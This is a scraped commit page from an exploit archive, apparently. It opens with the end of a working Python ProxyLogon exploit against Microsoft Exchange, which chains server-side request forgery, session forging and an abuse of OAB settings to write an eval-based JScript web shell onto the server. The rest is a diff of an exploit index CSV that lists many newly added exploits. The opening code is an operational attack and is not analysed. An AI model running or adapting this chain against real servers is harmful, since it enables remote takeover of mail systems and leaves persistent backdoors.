shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>'
legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % email
print("Attacking target " + target)
print("=============================")
print(legacyDnPatchByte.decode('hex'))
FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=autoDiscoverBody,
verify=False
)
if ct.status_code != 200:
print("Autodiscover Error!")
exit()
if "<LegacyDN>" not in ct.content:
print("Can not get LegacyDN!")
exit()
legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
print("Got DN: " + legacyDn)
mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
"Content-Type": "application/mapi-http",
"User-Agent": user_agent
},
data=mapi_body,
verify=False
)
if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content:
print("Mapi Error!")
exit()
sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)
proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
""" % sid
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent
},
data=proxyLogon_request,
verify=False
)
if ct.status_code != 241 or not "set-cookie" in ct.headers:
print("Proxylogon Error!")
exit()
sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
print("Got session id: " + sess_id)
print("Got canary: " + msExchEcpCanary)
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, sess_id, msExchEcpCanary),
"User-Agent": user_agent
},
verify=False
)
if ct.status_code != 200:
print("Wrong canary!")
print("Sometime we can skip this ...")
rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0]
# print "Got rbacRole: "+ rbacRole
print("=========== It means good to go!!!====")
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json={"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}},
verify=False
)
if ct.status_code != 200:
print("GetOAB Error!")
exit()
oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0]
print("Got OAB id: " + oabId)
oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#%s" % shell_content}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=oab_json,
verify=False
)
if ct.status_code != 200:
print("Set external url Error!")
exit()
reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"FilePathName": shell_absolute_path}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=reset_oab_body,
verify=False
)
if ct.status_code != 200:
print("Write Shell Error!")
exit()
print("Successful!")

19
files_exploits.csv
View file

@ -6770,9 +6770,11 @@ id,file,description,date,author,type,platform,port
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",1970-01-01,"Rafael Cintra Lopes",dos,multiple,
49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",1970-01-01,"Enes Özeser",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
@ -11292,6 +11294,7 @@ id,file,description,date,author,type,platform,port
49515,exploits/solaris/local/49515.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)",1970-01-01,"Marco Ivaldi",local,solaris,
49516,exploits/solaris/local/49516.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",1970-01-01,"Marco Ivaldi",local,solaris,
49517,exploits/solaris/local/49517.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49518,exploits/solaris/local/49518.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)",1970-01-01,"Marco Ivaldi",local,solaris,
49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple,
49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple,
@ -18523,7 +18526,9 @@ id,file,description,date,author,type,platform,port
49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",1970-01-01,scryh,remote,linux,
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - Server-Side Request Forgery",1970-01-01,F5,remote,windows,
49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",1970-01-01,LiquidWorm,remote,hardware,
49695,exploits/hardware/remote/49695.txt,"KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",1970-01-01,LiquidWorm,remote,hardware,
49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",1970-01-01,xynmaps,remote,multiple,
49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
@ -43874,6 +43879,7 @@ id,file,description,date,author,type,platform,port
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple,
49467,exploits/php/webapps/49467.txt,"MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",1970-01-01,"Deha Berkin Bir",webapps,php,
49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",1970-01-01,"Anita Gaud",webapps,php,
49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",1970-01-01,"Richard Jones",webapps,php,
@ -43888,15 +43894,19 @@ id,file,description,date,author,type,platform,port
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,ruby,
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",1970-01-01,LiquidWorm,webapps,ruby,
49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",1970-01-01,"Mahendra Purbia",webapps,php,
49485,exploits/php/webapps/49485.rb,"CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)",1970-01-01,"Alexandre ZANNI",webapps,php,
49486,exploits/php/webapps/49486.rb,"OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",1970-01-01,"Alexandre ZANNI",webapps,aspx,
49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload",1970-01-01,ABDO10,webapps,php,
49492,exploits/php/webapps/49492.txt,"BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting",1970-01-01,LiPeiYi,webapps,php,
49493,exploits/php/webapps/49493.txt,"Online Grading System 1.0 - 'uname' SQL Injection",1970-01-01,"Ruchi Tiwari",webapps,php,
49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",1970-01-01,mari0x00,webapps,php,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",1970-01-01,Lyghtnox,webapps,python,
49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",1970-01-01,0xB9,webapps,php,
49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",1970-01-01,"Richard Jones",webapps,php,
49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php,
49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated)",1970-01-01,"Darren Martyn",webapps,hardware,
49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
49502,exploits/php/webapps/49502.txt,"User Management System 1.0 - 'uid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
@ -43953,26 +43963,32 @@ id,file,description,date,author,type,platform,port
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",1970-01-01,Photubias,webapps,multiple,
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting",1970-01-01,"Praharsh Kumar Singh",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting",1970-01-01,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php,
49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",1970-01-01,Tadjmen,webapps,php,
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload",1970-01-01,"Suraj Bhosale",webapps,php,
49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",1970-01-01,"Suraj Bhosale",webapps,php,
49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",1970-01-01,"Deepak Kumar Bharti",webapps,php,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",1970-01-01,"Ricardo Ruiz",webapps,php,
49622,exploits/multiple/webapps/49622.sh,"Fluig 1.7.0 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,
49625,exploits/php/webapps/49625.py,"Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",1970-01-01,"Nicholas Ferreira",webapps,php,
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",1970-01-01,"Vadym Soroka",webapps,php,
49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple,
49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
49636,exploits/php/webapps/49636.txt,"CouchCMS 2.2.1 - Persistent Cross-Site Scripting",1970-01-01,xxcdd,webapps,php,
49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)",1970-01-01,testanull,webapps,windows,
49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",1970-01-01,"Richard Jones",webapps,php,
49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Richard Jones",webapps,php,
49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",1970-01-01,"Balaji Ayyasamy",webapps,php,
49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection",1970-01-01,bl4ckh4ck5,webapps,php,
49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",1970-01-01,"Murat ŞEKER",webapps,php,
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",1970-01-01,"Hosein Vita",webapps,multiple,
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",1970-01-01,"Berkan Er",webapps,multiple,
@ -43988,6 +44004,7 @@ id,file,description,date,author,type,platform,port
49670,exploits/php/webapps/49670.txt,"Boonex Dolphin 7.4.2 - 'width' Stored XSS",1970-01-01,"Piyush Patil",webapps,php,
49672,exploits/php/webapps/49672.py,"Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple,
49675,exploits/php/webapps/49675.svg,"CouchCMS 2.2.1 - Server-Side Request Forgery",1970-01-01,xxcdd,webapps,php,
49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware,
49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
@ -44069,6 +44086,7 @@ id,file,description,date,author,type,platform,port
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php,
49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl,
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",1970-01-01,boku,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
50462,exploits/aspx/webapps/50462.txt,"Umbraco v8.14.1 - 'baseUrl' SSRF",1970-01-01,NgoAnhDuc,webapps,aspx,
@ -44076,6 +44094,7 @@ id,file,description,date,author,type,platform,port
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php,
49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - Persistent Cross-Site Scripting",1970-01-01,"Ahmad Shakla",webapps,php,
49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php,
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",1970-01-01,"Leonardo Paiva",webapps,php,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php,

Can't render this file because it is too large.